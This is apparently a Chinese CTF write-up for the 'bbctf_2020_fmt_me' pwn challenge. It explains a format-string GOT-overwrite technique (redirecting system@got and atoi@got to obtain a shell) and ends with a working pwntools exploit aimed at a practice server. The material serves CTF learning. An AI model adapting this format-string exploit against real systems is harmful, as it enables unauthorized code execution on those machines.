bbctf_2020_fmt_me
<p>[TOC]</p>
<h1>分析</h1>
<p><img src="https://pic.imgdb.cn/item/63ad8b6c08b6830163dd4df3.png" alt="" /> </p>
<p>只有一个格式化字符串漏洞,而且执行一次,但是给了system函数,所以考虑覆盖system@got为main函数,然后修改get_init()函数里的atoi函数的got表为system@plt[1],跳过跳转system@got直接解析system真实地址并执行</p>
<p><img src="https://pic.imgdb.cn/item/63ad8c3908b6830163de9abc.png" alt="" /> </p>
<p>并在fgets输入的时候输入“/bin/sh”获取到shell</p>
<h1>Exploit</h1>
<pre><code>from pwn import*
# o = process('./pwn')
o = remote('node4.buuoj.cn', 25732)
system_got = 0x404028
system_plt = 0x401056
atoi_got = 0x404058
main = 0x4011F7
o.sendline('2')
payload = "%16$n"
payload += "%4198486p" + "%17$n" + "%417p" + "%18$n"
payload = payload.ljust(0x50, 'a')
payload += p64(atoi_got+4) + p64(atoi_got) + p64(system_got)
# pause()
o.sendline(payload)
o.interactive()
</code></pre>